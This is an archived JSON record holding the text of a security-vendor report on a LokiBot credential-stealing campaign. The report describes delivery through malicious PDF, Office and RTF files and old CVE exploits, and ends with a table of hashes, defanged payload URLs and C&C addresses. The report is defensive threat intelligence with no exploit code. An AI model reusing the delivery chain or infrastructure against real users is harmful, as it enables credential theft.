{
	"id": "630791d0-6ce6-450e-a500-5c59b0b2b7c2",
	"created_at": "2026-04-06T00:20:19.605773Z",
	"updated_at": "2026-04-10T03:20:35.764543Z",
	"deleted_at": null,
	"sha1_hash": "bece82bb7d386e822b5ca0da7e4a8a16f75f7fb8",
	"title": "New Campaign Sees LokiBot Delivered Via Multiple Methods",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 807993,
	"plain_text": "New Campaign Sees LokiBot Delivered Via Multiple Methods\r\nBy By: William Gamazo Sanchez, Bin Lin Aug 25, 2021 Read time: 3 min (709 words)\r\nPublished: 2021-08-25 · Archived: 2026-04-05 19:37:35 UTC\r\nIntroduction\r\nWe recently detected an aggressive malware distribution campaign delivering LokiBot via multiple techniques, including the\r\nexploitation of older vulnerabilities. This blog entry describes and provides an example of one the methods used in the\r\ncampaign, as well as a short analysis of the payload. We found that one of the command-and-control (C\u0026C) servers had\r\nenabled directory browsing, allowing us to retrieve updated samples.\r\nFigure 1. C\u0026C server with directory browsing enabled\r\nAlthough none of these techniques are particularly new, we want to build awareness about this campaign and encourage\r\nusers to patch their systems as soon as possible if they are potentially affected.\r\nAnalysis of the Adobe PDF malware delivery mechanism\r\nSome of the delivery methods we found included:\r\nPDF: Using Open Action Object\r\nDOCX: Using the Frameset mechanism\r\nRTF: Exploitation of CVE-2017-11882news article\r\nInternet Explorer: Exploitation of CVE-2016-0189\r\nExcel: Using embedded OLE Object and Word documents (With further exploitation of old vulnerabilities)\r\nLet’s take a look at one of the delivery methods, an Adobe PDF document attached to an email masquerading as an order\r\ninvoice email to fool customers. The PDF file, shown in Figure 2, is named “Revised invoice 2.pdf.”\r\nhttps://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nPage 1 of 7\n\nFigure 2. Screenshot of the PDF document sent to the targeted victim\r\nWhen the document is opened, the user is presented the option to allow or block a connection to a specific host at\r\n“192[.]23[.]212[.]137”.\r\nFigure 3. Option presented to the user upon opening the document\r\nThe URL is placed as an action in the PDF “OpenAction” directory, so a web visit is performed when the user opens the\r\ndocument.\r\nhttps://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nPage 2 of 7\n\nFigure 4. PDF document dictionary\r\nIf the user allows access to the site, an HTTP request is sent to the URL\r\nhttp://198[.]23[.]212[.]137/document/pdf_r34567888[.]html. The server responds with a malicious HTML document, shown\r\nin Figure 4. \r\nFigure 5. Code snippets from the malicious HTML page returned from server\r\nThe malicious web page exploits a vulnerability identified as CVE-2016-0189 to run the embedded PowerShell script.\r\nThe credential-stealing payload\r\nAfter deobfuscation, we can see the malware attempts to download the payload from\r\nhttp://198[.]23[.]212[.]137/regedit/reg/vbc[.]exe.\r\nThe payload vbc.exe is a variant of the LokiBot trojan we first detected in 2019. The main purpose of the malware is to steal\r\nuser credentials from the web browsers, FTP servers, and SMTP clients. It appears to have been compiled recently and\r\nuploaded to VirusTotal.\r\nhttps://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nPage 3 of 7\n\nFigure 6. Compilation timestamp of the malware\r\nFigure 7. Default folders\r\nFigure 8. C\u0026C server POST request\r\nThe importance of timely patching and observing best practices for security\r\nThis campaign shows that LokiBot and its variants are still being widely used and still use old and reliable techniques such\r\nas social engineering and vulnerability exploitation as delivery methods.\r\nhttps://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nPage 4 of 7\n\nUsers can protect themselves from campaigns that involve these techniques by observing basic security practices, such as\r\nrefraining from clicking links and opening attachments in suspicious or unsolicited emails. Organizations and individuals\r\nshould also update their systems as soon as possible since some of the delivery methods discussed in this blog post use\r\nvulnerability exploits.\r\nThe following security solutions can also protect users from email-based attacks:\r\nTrend Micro™ Cloud App Securityproducts – Enhances the security of Microsoft Office 365 and other cloud\r\nservices via computer vision and real-time scanning. It also protects organizations from email-based threats.\r\nTrend Micro™ Deep Discovery™ Email Inspectorproducts – Defends users through a combination of real-time\r\nscanning and advanced analysis techniques for known and unknown attacks.\r\nIndicators of Compromise\r\nDescription Hashes/URLs/IP Addresses Detection Name\r\nRevised invoice 2 .pdf c59ac77c8c2f2450c942840031ad72d3bac69b7ebe780049b4e9741c51e001ab Trojan.PDF.POWLOAD.AM\r\n2021-08-\r\n09_220350.pdf.pdf\r\n5a586164674423eb4d58f664c1625c6dfabcd7418048f18d4b0ab0b9df3733eb Trojan.PDF.POWLOAD.AM\r\nshipment assessment.pdf fb7fe37e263406349b29afb8ee980ca70004ee32ea5e5254b9614a3f8696daca Trojan.PDF.POWLOAD.AM\r\nLOA.PDF.pdf 98983e00b47bcbe9ebbaf5f28ea6cdbf619dd88c91f481b18fec7ffdb68ab741 Trojan.PDF.POWLOAD.AM\r\nBunker invoice 023.pdf 71998bb4882f71a9e09b1eb86bac1e0a0ac75bc4c20ee11373b90173cedc7d0b Trojan.PDF.POWLOAD.AM\r\nPO JHS-PO-2108-\r\n11425.rar-1.pdf\r\ne5d84990d7abd7b65655ac262d3cad346cdaf47f5861bff8b33b8bc755832288 Trojan.PDF.POWLOAD.AM\r\nN/A 2210000d2f877c9fd87efe97605e90549c5d9008a90f9b062a570fc12437e318 Trojan.W97M.LOKI.AOR\r\nContract 1459-PO21-\r\n15.docx\r\ne7a518b83d9f57a4cb8726afc6bb27a15f6e68655552e13b24481df83b9320fb Trojan.W97M.LOKI.AOR\r\nPI I229-I231.xlsx fc5bf62f57c77efa9f9264878f1753a35c27fb44bce7d9a00f8f094315355661 Trojan.X97M.CVE20180802.\r\nS28BW-421072010440.PDF.xlsx\r\nc6aede79cc1608da1e3ed5c8853b1718351429573679d6b847c90c44e48137d4 Trojan.X97M.CVE20180802.\r\n64DBB078907CDEB6E\r\n639f6453e961aa33302d34962ccdd29fbc9235b2a0df8b1ac0acc0bb040af7e0 Trojan.W97M.LOKI.AOT\r\n76CE5B8A21BB98A.mlw\r\nPO20-003609.xlsx b1b0045f890afd14b4168b4fc0017ac39c281fe5eee66d3c9523040e63220eb4 Trojan.X97M.CVE201711882\r\nhttps://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nPage 5 of 7\n\nrwer.wbk 3798eb011f5d8ee7f41e3666dac7fac279cf670ad4af4060aaef33a7def3c6f7 Trojan.W97M.CVE201711882\r\npdf_r34567888.html 45f1b4b0a627f1a2072818d00456dc4fc6607edf9a1a1c484f04f800d25b93d2 Trojan.HTML.POWLOAD.EQ\r\npdf_rg234999233.html da56c38fad7c2ee8e829aea9bd3c4b523ea0b65e935805d68df12c7a28e5d5dd Trojan.HTML.POWLOAD.EQ\r\nvbc.exe d8bb1bb8587840321e74cf2ab2f3596344cbb5ffeb77060bd9aade848fed03fd TrojanSpy.Win32.LOKI.PUHB\r\nvbc.exe 9f66135d831d5ba4972ba5db9e0fd4515dfaecc92013a741679d6cddbe29ab25 TrojanSpy.Win32.LOKI.PUHB\r\nvbc.exe 324d549fb7b9999aa0e6fb8a6824f7a05fe5f1f21d76fb2d360cb34c56eb1995 TrojanSpy.Win32.LOKI.PUHB\r\nvbc.exe ca155beb7d28cde5147eba7907c453d433b7675ba1830e87d5a4e409b5b912e1 TrojanSpy.Win32.LOKI.PUHB\r\nURL http://198[.]23[.]212[.]137/document/pdf_document_s233322[.]html Phishing\r\nURL http://198[.]23[.]212[.]137/document/pdf_document_sw211222[.]html Disease Vector\r\nURL https://ulvis[.]net/Q4gl Disease Vector\r\nURL https://ulvis[.]net/Q4km Disease Vector\r\nURL http://198[.]23[.]212[.]137/document/pdf_rg234999233[.]html Disease Vector\r\nURL http://198[.]23[.]212[.]137/document/pdf_r34567888[.]html Disease Vector\r\nC\u0026C IP Address 198[.]23[.]212[.]137 C\u0026C Server\r\nC\u0026C IP Address 104[.]21[.]62[.]89 C\u0026C Server\r\nC\u0026C IP Address 104[.]21[.]71[.]169 C\u0026C Server\r\nC\u0026C IP Address 185[.]227[.]139[.]5 C\u0026C Server\r\nC\u0026C IP Address 46[.]173[.]214[.]209 C\u0026C Server\r\nC\u0026C IP Address 192[.]227[.]228[.]106 C\u0026C Server\r\nTags\r\nhttps://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nPage 6 of 7\n\nSource: https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nhttps://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html"
	],
	"report_names": [
		"new-campaign-sees-lokibot-delivered-via-multiple-methods.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434819,
	"ts_updated_at": 1775791235,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bece82bb7d386e822b5ca0da7e4a8a16f75f7fb8.pdf",
		"text": "https://archive.orkl.eu/bece82bb7d386e822b5ca0da7e4a8a16f75f7fb8.txt",
		"img": "https://archive.orkl.eu/bece82bb7d386e822b5ca0da7e4a8a16f75f7fb8.jpg"
	}
}